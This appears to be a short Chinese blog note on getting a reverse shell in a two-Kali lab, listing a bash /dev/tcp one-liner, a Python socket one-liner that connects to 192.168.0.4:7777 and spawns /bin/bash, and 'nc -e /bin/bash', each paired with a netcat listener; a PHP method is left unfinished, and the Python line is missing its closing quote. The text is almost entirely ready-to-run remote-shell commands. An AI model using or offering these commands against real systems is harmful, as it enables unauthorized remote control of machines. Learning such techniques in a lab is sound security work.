实验环境:
两台kali
方法一:
bash -i >& /dev/tcp/ip/port 0>&1
nc -lvvp port

方法二
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.0.4',7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);
nc -lvvp port

方法三
nc -e /bin/bash ip port
nc -lvvp port

方法四:
利用php函数执行反弹shell(有待更新,这个操作确实很骚)
优秀总结文章:
本文详细介绍了在Linux环境下实现反弹Shell的四种方法,包括使用bash、nc、python等工具,每种方法都提供了具体的命令示例,是渗透测试和网络安全学习者的实用指南。
4549

被折叠的 条评论
为什么被折叠?



